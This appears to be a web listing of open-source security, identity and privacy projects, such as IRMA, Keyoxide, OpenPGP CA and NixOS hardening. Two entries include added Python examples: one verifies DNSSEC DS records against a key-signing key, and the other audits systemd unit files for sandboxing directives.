The project aims to extend the existing attribute-based identity platform IRMA with easy-to-use encryption. The kind of encryption is called Identity-Based. Its main advantage is that key management is simple, so that encryption becomes easy to use, via a plugin to an email client (only Thunderbird in this proof of concept project). The plugin computes the public key of the recipient of a message, from some uniquely identifying attribute of the recipient (typically an email address, but phone number, or citizen registration number could work as well). The receiver of the message will have to prove, via IRMA, possession of the uniquely identifying attribute to some Trusted Third Party (TTP), which will then provide the corresponding private key. Within this project a working set-up will be built. Turning it into a widely usable product will require more work, in follow-up projects.

>> Read more about A proof of concept of identity-based encryption

Icebreaker — Gemini centric viewpoint of coding issues and bug tracking

Modern software projects not only require source code repository management but also tools to plan projects and solve technical problems. Closed source solutions and online commercial services may be convenient, but they create significant concerns around control, autonomy and privacy, and they skew discoverability. Icebreaker believes in decentralised approaches which keep the coding repo separate from the project management repo. In terms of cooperation and teamwork, this helps to encourage new, flexible and dynamic approaches. These requirements are met through the minimalism of the Gemini protocol and its terse text format, Gemtext. It is modern because it is easy to understand; accessible to interact with (whether as a consumer or a contributor); and treats privacy as a foremost priority.

Icebreaker's flagship project, gLean, provides building blocks for navigating and interpreting one or more Gemini content sources (with settings, rulesets, and regex magic). (Non core) modules provide output in alternative formats, including Kanban boards. Creators will control their issue trackers. Creators' terms. Creators' conditions. 'Off-the-shelf' solutions can't compete against gLean's tailored approaches. FOSS communities can choose workflows that match their technical requirements, while supporting autonomy and adhering to their ethical values.

>> Read more about Icebreaker

imap-codec library — Release version 1.0 of the imap-codec library

With an expected volume of 333 billion messages per day in 2022, email is one of today's most common methods to exchange information on the Internet. For better or worse, email is unlikely to go away soon, meaning that even the latest software needs to support it in a trustworthy and resilient way. imap-codec is a misuse-resistant IMAP parsing and serialization library focusing on correctness and security. It should pave the way for a new generation of email clients, servers, and utilities written in Rust and become a reusable building block for the Next Generation Internet. To achieve that, it is essential to stabilize the API, improve testing, provide excellent documentation, and establish a welcoming and sustainable open-source environment for imap-codec.

>> Read more about imap-codec library

YunoHost and the Internet Cube — Solutions for DIY-ISP's and self-hosters

YunoHost is a free and open-source server distribution that provides a self-hosted alternative to commercial centralized services, and allows people to take back control over their data. Yunohost aims to make server administration accessible to the general public and ultimately make personal servers as common as desktop computers. Based on YunoHost, the Internet Cube project develops an affordable plug-and-play server that can be bought and easily deployed at home by the general public. In addition to its self-hosting capabilities, it provides a privacy-enhancing WiFi hotspot which protects its users from censorship and metadata leaks. And because it is low-power, it can be used even in remote and offline situations.

>> Read more about YunoHost and the Internet Cube

Interpeer SDKs — Secure and efficient peer-to-peer networking stack

The Interpeer Project's purpose is to research and develop novel peer-to-peer technologies for open and distributed software architectures. The goal is to enable serverless modes of operation for collaborative software with rich feature sets equal to or surpassing centralized client-server architectures. In order to make the Interpeer technology stack accessible to software developers, the goal is to provide SDKs for a desktop and a mobile platform, complete with examples. These SDKs should enable seamless cross-platform data exchange and live editing capabilities by multiple authors.

>> Read more about Interpeer SDKs

IRMA made easy — Usability research into attribute based authentication

Authentication methods, like passwords, often involve a trade-off between usability and security. Secure passwords are a hassle to use, and easy-to-use passwords are often also easy to guess or to brute force. Clearly, there is a need for authentication methods that are both secure and user-friendly. The IRMA mobile app can fill this gap. It was originally developed with a strong focus on providing secure and privacy-friendly authentication. This project will focus on making IRMA easy to use for everyone. We will conduct a formal large-scale evaluation of IRMA that focuses on usability in general as well as on accessibility (i.e. for users with disabilities) in particular. By doing so, usability hindrances can be identified and improved, making IRMA user-friendly and accessible for users with the widest range of capabilities.

>> Read more about IRMA made easy

Keyoxide — Self-hostable identity proofs with bidirectional linking verification

How do you discover which other online accounts across different services and service providers actually belong to the same person? Keyoxide is a secure, privacy-friendly and decentralized platform to manage online identities, uncompromisingly driven by what the user herself wants to share.

Keyoxide is a new type of service that allows proving linked account ownership on a variety of platforms. Keyoxide leverages existing and battle-tested cryptographic primitives. The goal is to give users more control over their online presence, independent from dominant internet actors, without having to depend on any centralised services or third parties. The project will improve the usability of the current Keyoxide and its emerging underlying technology (Decentralized OpenPGP Identity Proofs). More service providers will be added and additional tools to provide proofs will be developed, to create a smooth and easy onboarding process for less tech-savvy people.

>> Read more about Keyoxide

Private Key Operations for Keyoxide — Implement Private Key Store design in Keyoxide

Keyoxide is one of the open-source success stories when it comes to providing an alternative to the proprietary product (Keybase). The UI is straightforward so that the interaction with the site is available to all kinds of users. Unfortunately there is one critical part that differentiates Keyoxide from Keybase - no support for private key operations. Adding proofs requires a complex maze of command line invocations. This project will implement best of both worlds: simple, UI centric way of interaction without technical knowledge required and the strong security of Keyoxide.

>> Read more about Private Key Operations for Keyoxide

Keyoxide v2 — Add cryptographic signature based profiles to Keyoxide

How do you discover which other online accounts across different services and service providers actually belong to the same person? Keyoxide is a secure, privacy-friendly and decentralized platform to manage online identities, uncompromisingly driven by what the user herself wants to share.

Keyoxide is a new type of service that allows proving linked account ownership on a variety of platforms. Keyoxide leverages existing and battle-tested cryptographic primitives. The goal is to give users more control over their online presence, independent from dominant internet actors, without having to depend on any centralised services or third parties. The project will build on top of the existing OpenPGP Identity Proofs to add other types of profiles based on various cryptographic signature mechanisms from a variety of new tools. To maintain linkable profiles, a new signature-hosting infrastructure needs to be designed and developed. Other improvements are aimed at safeguarding privacy and achieving plausible deniability.

>> Read more about Keyoxide v2

DNSSEC Key Signing Suite — A best practice for DNSSEC key signing

DNSSEC provides trust in the DNS by guaranteeing the authenticity and integrity of DNS responses. As DNS is of fundamental importance to most Internet communication, this is a vital function that needs safeguarding. Beyond providing trust in the DNS, DNSSEC is a key enabler for other technologies that improve the security, privacy and trust of Internet users. In the DNSSEC Key Signing Suite project we build a set of tools, scripts and guidelines (a playbook) to facilitate simple key signing with a standardised ceremony that has automated checks and audits where possible. The impact of this will be twofold. First, it leads to reliable, predictable and verifiable key ceremonies, which improves the trust in DNSSEC. Second, it will significantly ease the burden of operation, bringing the use of a validated and trustworthy signing procedure within reach for many more DNSSEC operators than today (e.g. smaller or less profitable top-level domain operators).
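One of the automated checks a key ceremony wants is that the DS record the parent zone publishes really corresponds to the key-signing key that was just generated: a wrong key tag or digest leaves the zone unvalidatable once the old key is withdrawn. The following is an added example, not part of the DNSSEC Key Signing Suite, that computes the RFC 4034 key tag and the DS digest (types 2 and 4 from RFC 4509 and RFC 6605; type 1 only for checking legacy records) from a DNSKEY and compares them against a DS in presentation format. The DNSKEY it runs on is a constructed placeholder with a four-byte "public key", which is enough to exercise the arithmetic but is not a real curve point.

```python
import base64
import hashlib
import struct

# DS digest types (RFC 4034, RFC 4509, RFC 6605). SHA-1 is kept only so that
# legacy DS records can still be checked; new DS records should use type 2 or 4.
DIGEST_TYPES = {1: hashlib.sha1, 2: hashlib.sha256, 4: hashlib.sha384}


def name_to_wire(name: str) -> bytes:
    """Canonical (lower-case) wire-format owner name, RFC 4034 section 6.2."""
    labels = name.lower().rstrip(".").split(".") if name.strip(".") else []
    out = b""
    for label in labels:
        if not 0 < len(label) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def dnskey_rdata(flags: int, protocol: int, algorithm: int, public_key_b64: str) -> bytes:
    """DNSKEY RDATA: 16-bit flags, 8-bit protocol (always 3), 8-bit algorithm, key."""
    return struct.pack("!HBB", flags, protocol, algorithm) + base64.b64decode(public_key_b64)


def key_tag(rdata: bytes) -> int:
    """RFC 4034 Appendix B key tag (all algorithms except the obsolete RSA/MD5, 1)."""
    if rdata[3] == 1:
        raise ValueError("algorithm 1 uses a different key tag computation")
    ac = 0
    for i, b in enumerate(rdata):
        ac += (b << 8) if i % 2 == 0 else b
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


def ds_digest(owner: str, rdata: bytes, digest_type: int = 2) -> str:
    """digest = H(canonical owner name | DNSKEY RDATA), upper-case hex."""
    return DIGEST_TYPES[digest_type](name_to_wire(owner) + rdata).hexdigest().upper()


def ds_record(owner, flags, protocol, algorithm, public_key_b64, digest_type=2) -> str:
    """Presentation-format DS RDATA: '<key tag> <algorithm> <digest type> <digest>'."""
    rdata = dnskey_rdata(flags, protocol, algorithm, public_key_b64)
    return f"{key_tag(rdata)} {algorithm} {digest_type} {ds_digest(owner, rdata, digest_type)}"


def ds_matches(published_ds: str, owner, flags, protocol, algorithm, public_key_b64) -> bool:
    """Ceremony check: does the DS the parent publishes match this KSK exactly?"""
    tag, alg, dtype, digest = published_ds.split()
    if int(dtype) not in DIGEST_TYPES:
        return False
    rdata = dnskey_rdata(flags, protocol, algorithm, public_key_b64)
    return (int(tag) == key_tag(rdata) and int(alg) == algorithm
            and digest.upper() == ds_digest(owner, rdata, int(dtype)))


if __name__ == "__main__":
    # Constructed sample KSK: flags 257 = ZONE|SEP, algorithm 13 = ECDSAP256SHA256.
    # The 4-byte "public key" is a placeholder, not a real curve point.
    print("example. IN DS", ds_record("example.", 257, 3, 13, "AAECAw=="))
```

The owner name is lower-cased before hashing because the DS digest is defined over the canonical form; a ceremony script that feeds in the name as typed by an operator would otherwise produce a digest that no validator accepts. Comparing the whole DS (tag, algorithm, digest type and digest) rather than the key tag alone matters because key tags are 16-bit and collide.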

>> Read more about DNSSEC Key Signing Suite

Improve Email Encryption in KMail — Adopt improvements in Email Encryption in KMail

The goal of this project is to make it simpler for inexperienced users to just use encrypted mail, at the click of a button. Autocrypt is a new method for email encryption that needs almost no user interaction: it performs the needed key exchange transparently in the background and does key management automatically. Encrypted Headers is a protocol for sending mail headers inside the encrypted part of the mail. Traditional encryption methods leak this metadata, which can be used for mass surveillance purposes. The result will be part of the KDEPIM codebase, so you don't have to install anything other than KMail to use these improvements.

>> Read more about Improve Email Encryption in KMail

ARPA2 LDAP Middleware — Privacy enhancing middleware

Some protocols are far better known than others. Everyone will recognise the HTTP protocol we use to transfer web pages. LDAP is not as well known, but it is also a key technology we use on a daily basis - in fact it shapes how most organisations are organised online. LDAP is a proven technology but can be cumbersome to work with, and as a result it has seen little innovation in recent years.

This project develops a number of innovative middleware components from the ARPA2 project. This includes a privacy-enhancing middleware for LDAP (LEAF), which performs attribute filtering and selective transformation of LDAP traffic; SteamWorks, which allows for responsive large-scale configuration and trust delegation; and LillyDAP, a library that can be used to easily add LDAP to any application. The project also delivers broader deployability of these building blocks by providing tools for distro packaging of the solutions produced by the project.

>> Read more about ARPA2 LDAP Middleware

LDAP Synchronization Connector — Synchronize data from/to various data sources with LDAP

LSC (LDAP Synchronization Connector) is community open source software designed to get rid of all the customized scripts developed by system administrators to sync their files or databases in order to maintain accounts and groups in an LDAP directory. LSC works with one configuration file and can connect to any database, LDAP directory (including Active Directory) or REST API. It solves use cases like "create an account for every new person hired in the company", "lock this account in Active Directory because it was locked in OpenLDAP", "create a group for all people of this department" or "push accounts to this application API". The project will refresh all the dependencies and add new features such as allowing JavaScript in LDAP filters.

>> Read more about LDAP Synchronization Connector

SCIM integrations — System for Cross-domain Identity Management (SCIM)

Most organizations have a digital work environment that is composed of many applications. With a Single Sign-On (SSO) system they get a unified login and logout experience, but there is a catch. Traditional SSO protocols like OpenID Connect do not support syncing user profiles across applications. For instance, users are deleted in the SSO system but not in the applications. Hence, SSO implementations are not GDPR compliant by default, and organizations have to develop custom processes to avoid violations. SCIM is a standard developed within the Internet Engineering Task Force designed to solve exactly that. The project is to develop a SCIM client for Keycloak and a SCIM service provider for Nextcloud, Rocket.Chat, Matrix and Stackspin.

>> Read more about SCIM integrations

MoboSearch — Providing an alternative view on the Android App ecosystem

Mobile phones play a major role in our society, yet they still suffer from severe limitations in how they handle apps. As a result, most people are unaware of the dangers of privacy leaks and are typically offered very constrained search capabilities within one single source of information, the app store. MoboSearch is a new search engine and information portal for apps, empowering users beyond the existing app stores. The system exposes privacy and security information, like app permissions, and gives users new, easy and flexible search capabilities that allow them to make an informed choice and increase people's awareness. Openness and interoperability ensure that the system can offer and receive data, so as to cooperatively enable a better and healthier app ecosystem.

>> Read more about MoboSearch

Distributed Trust for Web Servers — Establishing a Distributed Trust Authority

The M-Pin protocol, and its implementation in the Milagro project currently incubating at Apache, provides cryptographic security using a distributed trust model. In place of the single point of failure (and high-value target for social engineering attacks) of today's Certificate Authorities (CAs), cryptographic verification is assembled from two or more mutually independent authorities, all of which would need to be subverted at once to break security. This project helps bring distributed trust to the Web, by implementing M-Pin support via Milagro's libraries in leading Open Source web servers. This will pave the way both to a distributed trust alternative to monolithic CAs and browser trust lists, and to a distributed trust alternative to protocols such as OpenID for user identification.

>> Read more about Distributed Trust for Web Servers

MTE - the MirageOS Taler Exchange — Implement Taler Exchange functionality in OCaml-based unikernel

This project will develop a drop-in implementation of a GNU Taler exchange with the unikernel framework MirageOS. The GNU Taler Exchange is a service that needs to be robust and highly secure (and must allow very high security deployments). MirageOS uses OCaml, a functional programming language with a static type system which catches many errors at compile time and provides memory safety. With MirageOS, one only embeds the code that is really required to run the service in the virtual machine image, resulting in a much smaller attack surface.

The resulting solution will use very little resources (memory usage / CPU cycles), which is beneficial both from a green computing perspective, and from a performance perspective. The plan is to use existing tests of GNU Taler exchange, in addition to our own fuzz testing, to ensure that MTE acts the same as GNU Taler exchange.

>> Read more about MTE - the MirageOS Taler Exchange

Namecoin: Core Infrastructure — Alternative domain name system

Namecoin is a blockchain project that provides a decentralized naming system and trust anchor. Our flagship use-case is a decentralized top-level domain (TLD) which is the cornerstone of a domain name system that is resistant to hijacking and censorship. This project is meant to improve the security and usability of core components of Namecoin.

>> Read more about Namecoin: Core Infrastructure

Namecoin: ZeroNet and Packaging — Make ZeroNet work with Namecoin

Namecoin provides a decentralized naming system and trust anchor. Its flagship use-case is a decentralized top-level domain (TLD) which is the cornerstone of a domain name system that is resistant to hijacking and censorship. Among other things, this provides a decentralized trust anchor for Public Key Infrastructure that does not require third party trust. It operates independently from the DNSSEC root trust chain, and can thus offer additional security under some circumstances. ZeroNet is a decentralized web-like network of peer-to-peer users, which provides an alternative to Tor onion services. In the project, ZeroNet will be adapted to support a local Namecoin client, and provide additional assurances such as a Host-header-like mechanism to protect users from spoofing. Namecoin will be used as a human-readable naming layer for Tor onion services and ZeroNet sites. This eliminates the user problem of pseudorandom, unmemorable website addresses for onion services and ZeroNet sites, which can facilitate phishing attacks.

>> Read more about Namecoin: ZeroNet and Packaging

NixOS/Clevis — Unattended disk decryption with Clevis on NixOS

Whether they should or not, organisations are moving their data to third party servers (aka the "cloud"). While full disk encryption of servers should be standard everywhere in order to protect the sensitive data they inevitably hold, its adoption is still lagging. This isn't just lack of awareness; part of the tooling is also missing. With full disk encryption comes a big pain point: restarting the server requires the root file system to be unlocked before the OS can boot.

While it is possible to log into a server remotely to unlock it, this creates a dependency on a human operation in order to boot a server without compromising security. This is sometimes an unacceptable drawback: it rules out unattended reboots and recovery from power loss, and it doesn't scale well with the number of servers.

This project will make disk encryption with remote unlocking part of NixOS, bringing together a number of innovative mechanisms such as system extension images and stage1-networkd. While this does not make using the cloud safe and private in and by itself (that is impossible), it will contribute to making it somewhat safer and more private.

Additionally the project will port the Proxmox hypervisor to NixOS, in order to benefit from NixOS-style declarative host configuration and deployment (which is very valuable when managing a cluster of machines, to avoid configuration rot). Proxmox is a hypervisor that can run small to medium-sized VM clusters and is capable of handling multi-node clusters.

>> Read more about NixOS/Clevis

Securing NixOS services with systemd

NixOS, with the Nix package manager, provides different services that can be installed and configured in a reproducible, declarative way. But how does one know whether software sticks to what it is supposed to do, and prevent a malicious application from spying on others?

Systemd provides users with ways to specify fine-grained sandboxing options for their running services, taking advantage of the Linux kernel's security facilities. This project will improve the default configuration of the services that are available in NixOS using systemd, so that users may deploy services without granting them too much trust: the services would only have access to the parts of the system they require. From a security point of view, this limits the attack surface of the system and substantially improves defense in depth. It also means that services would not be able to snoop on the rest of the user's system.

To gain long-term benefits from this project, we will develop automated tools to help with finding the right configuration for a given service, and we will write documentation to help people who want to secure other services themselves.
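The sandboxing options referred to above are plain directives in the `[Service]` section of a unit file (on NixOS they are set as attributes of `systemd.services.<name>.serviceConfig`). The following is an added example, not a tool from this project, of the kind of automated check the paragraph mentions: it parses a unit file and reports which of a baseline set of sandboxing directives are missing or weakened. The two unit files are constructed samples; the directive names and values are real systemd ones, but the baseline itself is an opinionated choice for a long-running network service, not a systemd or NixOS standard.

```python
import textwrap

# Constructed sample units. WEAK_UNIT is what many service files look like;
# HARDENED_UNIT carries the sandboxing directives the audit below asks for.
WEAK_UNIT = textwrap.dedent("""\
    [Unit]
    Description=example web service (constructed sample, not hardened)

    [Service]
    ExecStart=/usr/bin/example-web
    User=root
    ProtectSystem=full
""")

HARDENED_UNIT = textwrap.dedent("""\
    [Unit]
    Description=example web service (constructed sample, hardened)

    [Service]
    ExecStart=/usr/bin/example-web
    DynamicUser=yes
    StateDirectory=example-web
    NoNewPrivileges=yes
    PrivateTmp=yes
    PrivateDevices=yes
    ProtectSystem=strict
    ProtectHome=yes
    ProtectKernelTunables=yes
    ProtectKernelModules=yes
    ProtectControlGroups=yes
    RestrictNamespaces=yes
    LockPersonality=yes
    MemoryDenyWriteExecute=yes
    RestrictRealtime=yes
    RestrictAddressFamilies=AF_INET AF_INET6 AF_UNIX
    CapabilityBoundingSet=
    SystemCallFilter=@system-service
    SystemCallFilter=~@privileged @resources
""")

_TRUE = {"yes", "true", "on", "1"}


def parse_unit(text):
    """Minimal unit-file parser: section -> directive -> list of values.
    Repeated directives (for example SystemCallFilter=) are kept in order."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line[0] == "[" and line[-1] == "]":
            current = sections.setdefault(line[1:-1], {})
            continue
        key, sep, value = line.partition("=")
        if current is not None and sep:
            current.setdefault(key.strip(), []).append(value.strip())
    return sections


def _is_true(values):
    return bool(values) and values[-1].lower() in _TRUE


# Directives that should be "yes" on a typical long-running network service.
_BOOLEAN = ("NoNewPrivileges", "PrivateTmp", "PrivateDevices", "ProtectKernelTunables",
            "ProtectKernelModules", "ProtectControlGroups", "RestrictNamespaces",
            "LockPersonality", "MemoryDenyWriteExecute", "RestrictRealtime")
# Directives whose presence (even with an empty value) denotes a restriction:
# "CapabilityBoundingSet=" means no capabilities at all.
_PRESENT = ("RestrictAddressFamilies", "CapabilityBoundingSet", "SystemCallFilter")


def audit_unit(text):
    """Return a list of 'Directive: problem' strings; an empty list means all checks pass."""
    svc = parse_unit(text).get("Service", {})
    problems = []
    for d in _BOOLEAN:
        if not _is_true(svc.get(d, [])):
            problems.append(f"{d}: not set to yes")
    for d in _PRESENT:
        if d not in svc:
            problems.append(f"{d}: not set (no restriction applied)")
    ps = svc.get("ProtectSystem", [""])[-1].lower() or "not set"
    if ps != "strict":
        problems.append(f"ProtectSystem: {ps}; 'strict' mounts the file system read-only "
                        "except paths granted via StateDirectory= or ReadWritePaths=")
    ph = svc.get("ProtectHome", [""])[-1].lower() or "not set"
    if ph not in _TRUE | {"read-only", "tmpfs"}:
        problems.append(f"ProtectHome: {ph}")
    user = svc.get("User", [""])[-1]
    if not _is_true(svc.get("DynamicUser", [])) and user in ("", "root", "0"):
        problems.append("User: service runs as root; set DynamicUser=yes or a dedicated User=")
    return problems


if __name__ == "__main__":
    for name, unit in (("weak", WEAK_UNIT), ("hardened", HARDENED_UNIT)):
        print(f"{name}: {len(audit_unit(unit))} problem(s)")
        for p in audit_unit(unit):
            print("  -", p)
```

On a live system `systemd-analyze security <unit>` performs a far more complete assessment and is the better starting point; a script like this is useful in CI, where no running systemd is available. The baseline is not universally safe to apply blindly: `MemoryDenyWriteExecute=yes` breaks runtimes that JIT-compile, `SystemCallFilter=` has to be tuned per service (start from `@system-service` and look at what the service actually needs), and `ProtectSystem=strict` requires every writable path to be granted explicitly, which is what `StateDirectory=` does in the hardened sample.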

>> Read more about Securing NixOS services with systemd

Nym Credentials — A decentralised solution for authentication

Nym Credentials provides open-source code for privacy-enhanced authentication and authorization in a decentralized environment. Today, when using "single-sign in" solutions, users hand over their personal data to third-party identity providers such as Facebook Connect and Sign-In with Google. Nym Credentials tackles this problem by allowing users to securely authenticate and transfer personal data (and proofs of private data) while maintaining privacy without a centralized identity provider. Each credential is cryptographically unlinkable between usages and multiple decentralized identity providers can verify this data. Open-source Nym credential libraries can be easily integrated into existing services, with a focus on federated and decentralized European environments.

>> Read more about Nym Credentials

Opaque Sphinx — Secure password-based authentication with Opaque/Sphinx

Opaque Sphinx is a project that aims to secure password-based authentication by deploying the state-of-the-art SPHINX and OPAQUE cryptographic protocols to eliminate almost all common attack vectors - such as weak guessable passwords, password reuse, phishing, password databases, offline dictionary attacks and database leaks - plaguing current solutions. These protocols provide the strongest available cryptographic properties, backed by cryptographic proofs. The project intends to port its already existing free software SPHINX implementation - which already supports Linux and Windows - to Android so it can also be used on smartphones.

>> Read more about Opaque Sphinx

Opaque Sphinx Server and Clients — Server and tools for modern authentication

Passwords are probably the most common way to remotely use private services, which makes them a major liability - humans on average find it very hard to memorize strong passwords. Luckily, passwords - or more particularly tools to work with passwords more safely - are evolving as well. SPHINX is a novel approach to password storage that is information-theoretically secure. And unlike most online password managers, the user does not even have to trust the server. OPAQUE is a novel protocol that can be used to eliminate phishing as an attack vector when authenticating to servers. The combination of SPHINX and OPAQUE provides some very strong guarantees while still allowing users to remember only one or just a few passwords. This project will develop a SPHINX server in a safe, compiled language, with ample tests. It will also further develop and refine a protocol on top of SPHINX, handling creation, deletion, backup and changing of data. In addition it will add the OPAQUE protocol to various free software ecosystems such as PHP, Java, Node.js, Ruby, Go, Erlang and Rust, as well as to the two most used web servers: nginx and apache2.

>> Read more about Opaque Sphinx Server and Clients

OpenPGP Certificate Authority — Managing OpenPGP keys for communities and organisations

OpenPGP CA is a tool for managing OpenPGP keys within an organization. Its primary goal is to make it trivial for end users to authenticate the OpenPGP keys of users in their organization, and in adjacent organizations. In an OpenPGP CA-using organization, users delegate authentication to an in-house CA. This allows users to securely and seamlessly communicate via PGP-encrypted email without having to manually compare fingerprints, without having to understand OpenPGP keys or signatures, and without having to trust a third party with potentially conflicting interests. This goal is achieved by shifting the authentication burden from individual users to an organization's administrator, and by providing a tool that largely automates key creation, signing and dissemination. Importantly, because OpenPGP CA works within the existing OpenPGP framework, users do not need any new software to take advantage of OpenPGP CA's benefits; they can continue to use existing email clients and encryption plugins. Further, OpenPGP CA can co-exist with other authentication approaches, like traditional key signing workflows.

>> Read more about OpenPGP Certificate Authority

Hardening OpenPGP CA deployments — HSM support for OpenPGP key infrastructure

OpenPGP CA is a tool for managing and certifying OpenPGP keys in organizations. Today, the private key material of OpenPGP CA instances is stored and used locally. This project will add support for two hardened modes of operation: 1) using a hardware-token (OpenPGP Card) based key for the CA, and 2) split OpenPGP CA deployments, in which critical operations are performed on a highly protected machine (e.g. air-gapped), while regular operation can take place conveniently on an online CA instance.

In addition, the project will build an OpenPGP CA based tool for version control signing workflows (e.g. git), with a focus on providing a smooth user experience for signing with OpenPGP card devices.

>> Read more about Hardening OpenPGP CA deployments

Interoperable Certificate Store for OpenPGP — Standardisation effort for shared OpenPGP certificate storage

This project will build a public cert store for OpenPGP keys, with well-defined data structures and access mechanisms to facilitate interoperability between OpenPGP implementations. It builds on pgp-cert.d, which stores certs and has an API to access them. Beyond the common format and API, the project will also add Sequoia-specific indices where standardization does not make sense. sq, Sequoia's command line tool, will be adapted to use the cert store. In addition, the project aims to develop a privacy-preserving way to update the certs from keyservers.

>> Read more about Interoperable Certificate Store for OpenPGP

Improving OpenSSH's Authentication and PKI — Improving SSH Authentication with OpenPGP transitive trust

It would not be a stretch to say that ssh secures the Internet - it is the protocol most relied on to log into servers of any type. Yet its authentication model is inflexible, rarely used properly, and inadequate. OpenPGP's transitive trust (aka "web of trust") mechanisms and revocation certificates can help to provide additional automated assurances. By publishing and certifying OpenPGP keys for servers, an ssh client may be able to automatically check whether a connection is not only encrypted, but also authenticated. Similarly, server administrators can automatically find the right public key for users. And when a server key or user key is compromised, using OpenPGP, it is straightforward to ensure that it won't be trusted: just publish a revocation certificate. This project will add OpenPGP support to OpenSSH to improve and simplify these workflows.

>> Read more about Improving OpenSSH's Authentication and PKI

Owncast — ActivityPub powered Livecasting

Owncast is a self-hosted, open source live streaming platform for people to easily host and manage their own live streams. It has become an increasingly popular option for many people to break away from the large centralized services. The project will add Fediverse (ActivityPub) integration in order to provide better means of discovery, increase engagement, and to have interoperability with other applications. The goal is for Owncast to become a fully fledged member of the Fediverse, focusing on people's streams being discovered with existing timelines and search indexes. This would allow people to for instance contribute comments directly from their own ActivityPub-powered website or ActivityPub-powered link aggregators like Lemmy.

>> Read more about Owncast

Peppol for the masses — Hybrid self-hosted e-invoicing with decentralized identities

Peppol is an EU-backed e-Invoicing network which uses a top-down certification infrastructure to establish trust between the sender and the receiver of an invoice. In the "Peppol for the Masses!" project, we will implement Peppol in PHP (so far only Java and C# implementations are available), and package its core components (the AS4 sender and the AS4 receiver) as a Nextcloud app, so that users of the popular Nextcloud personal cloud server can send and receive invoices over AS4 directly into their self-hosted server.

Due to the top-down nature of Peppol's trust infrastructure, it's not possible to self-host a node in the Peppol network unless you go through a reasonably heavy certification process. Therefore, we will extend our implementation with support for self-hosted identities, using the "WebID" identity pattern which was popularized by the Solid project. We will also develop a re-signing gateway which replaces the signature on an AS4-Direct invoice with a Peppol-certified signature. In a follow-up project, we will also host an instance of this re-signing gateway and make it available free of charge, similar to how the LetsEncrypt project has made TLS certificates available free of charge.

This project will lower the (cost) barrier for machine-readable cryptographically-signed e-Invoicing messages, and at the same time increase the sovereignty of end-users, towards a human-centric internet of business documents.

>> Read more about Peppol for the masses

Adding Web-of-Trust Support to PGPainless — Web-of-Trust specification support for Java

Reliable authentication of public key certificates is a hard requirement for strong and effective end-to-end encryption. The "Web-of-Trust" (WoT) serves as an example of a decentralized authentication mechanism for OpenPGP. While there are some existing implementations of the WoT in applications such as GnuPG, their algorithms are often poorly documented. As a result, WoT support in client applications is often missing or inadequate.

PGPainless is an easy-to-use, secure-by-default OpenPGP library for Java and Android. This project will extend PGPainless with an implementation of the recently published Web of Trust specification. The goal is to make the Web of Trust more interoperable and accessible to client applications, overall increasing the usability and ergonomics of OpenPGP for the end user.

>> Read more about Adding Web-of-Trust Support to PGPainless

Privacy Enhancements for PowerDNS and DNSdist — Make it easier to deploy private DoT/DoH resolvers

DNS over TLS (DoT) and DNS over HTTPS (DoH) are two recent developments in the DNS field, and currently these are dominated by US-based providers. The project will enhance the availability of open, trustworthy, privacy-respecting DNS resolvers in such a way that any DNS provider, operator, or user can provide encrypted DNS service. This project aims to speed up implementation, improvement and standardisation of the most important privacy-enhancing features of DNSdist and the PowerDNS resolvers, to allow the entire DNS chain (from client, to caching resolver, to authoritative nameserver) to be encrypted. The project will add support for the necessary privacy features to the (open source) PowerDNS components (dnsdist, recursor and authoritative server).

>> Read more about Privacy Enhancements for PowerDNS and DNSdist

Prosody IM — Implement SASL authentication mechanism for XMPP

XMPP is the most widely deployed standard protocol for real-time messaging today, and is a very popular choice among individuals and organizations who wish to manage their own internet communications, instead of submitting to other (e.g. commercial/data-driven) communication platforms. For an XMPP user to log in to their account today, two things are required: a username and a password. This has remained unchanged for many years, while other technologies have been steadily advancing to support security-enhancing features such as multi-factor authentication or even self-sovereign identities.

XMPP uses an authentication umbrella standard known as SASL to authenticate all connections. The way XMPP integrates SASL is defined in RFC 6120 and assumes a very simple challenge-response flow, which has worked well in allowing us to upgrade the network from older SASL mechanisms such as DIGEST-MD5 onto more modern mechanisms such as SCRAM-SHA-1 and SCRAM-SHA-256.

To gain new authentication features beyond simple password authentication, we need to evolve XMPP’s relationship with SASL. This project will deliver just that, and will be the first complete implementation of a proposed standard (XEP-0388: Extensible SASL Profile) into the popular Prosody XMPP server. It will also implement support for per-session access control throughout Prosody, and support for XEP-0386 (Bind 2.0).

>> Read more about Prosody IM

Python bindings to the rattler library

Rattler is a Rust-based library to interact with the conda package ecosystem (which provides binary, cross-platform software packages for Windows, macOS and Linux). Rattler makes it easy to resolve package dependencies with a SAT solver, download the packages, and create virtual environments on the user’s computer.

The main focus of this project is the py-rattler bindings, which give users the power to use rattler from Python to create virtual environments programmatically. Furthermore, py-rattler will be used by other tools in the ecosystem such as the bot infrastructure that powers “conda-forge”, the largest open source repository in the conda universe.

>> Read more about Python bindings to the rattler library

Rauthy — Reliable OpenID Connect IdP and IAM solution.

Rauthy is a lightweight and easy to use OpenID Connect Identity Provider. It aims to be simple to both set up and operate, with very secure defaults and lots of config options if you need the flexibility. It puts heavy emphasis on Passkeys and on strong security in general. The project is written in Rust to be as memory-efficient, secure and fast as possible, and it can run on basically any hardware. If you need Single Sign-On support for IoT or headless CLI tools, it has you covered as well. You get high availability, client branding, UI translation, a nice Admin UI, events and auditing, and many more features. By default, it does not depend on an external database but runs on top of Hiqlite, an embeddable SQLite database that can form a Raft cluster to provide strong consistency and high availability - although it can use e.g. Postgres as an alternative. This makes it simple to operate, while scaling up to millions of users easily.

>> Read more about Rauthy

Redwax — Standardisation of client side PKI interfaces

The internet was not designed as a public infrastructure, and most of the engineering trade-offs of the lower-layer technologies have generally erred on the side of accommodating fast growth and ease rather than values such as security, confidentiality and privacy. Yet today the internet is everywhere, from providing a place for democratic discourse to healthcare to finance and personal communication. Redwax aims to decentralise trust management so that the values of security, confidentiality and privacy can be upheld in public infrastructure and private interactions. The overarching goal of Redwax is to strengthen the existing technologies and infrastructure by providing a modular and practical set of tools to manage public key based trust infrastructures as currently used. These tools capture and hard-code a lot of industry best practice and specialist PKI knowledge so that they can be put into the hands of a much wider community than is currently served by a few specialist industries. With this project the Redwax team hopes to help re-establish (and/or strengthen) the support for these non-centralized trust management technologies inside web browsers and other relevant applications by working with standards organizations and industry coordination groups, and to create the initial reference implementations for their standardisation.

>> Read more about Redwax

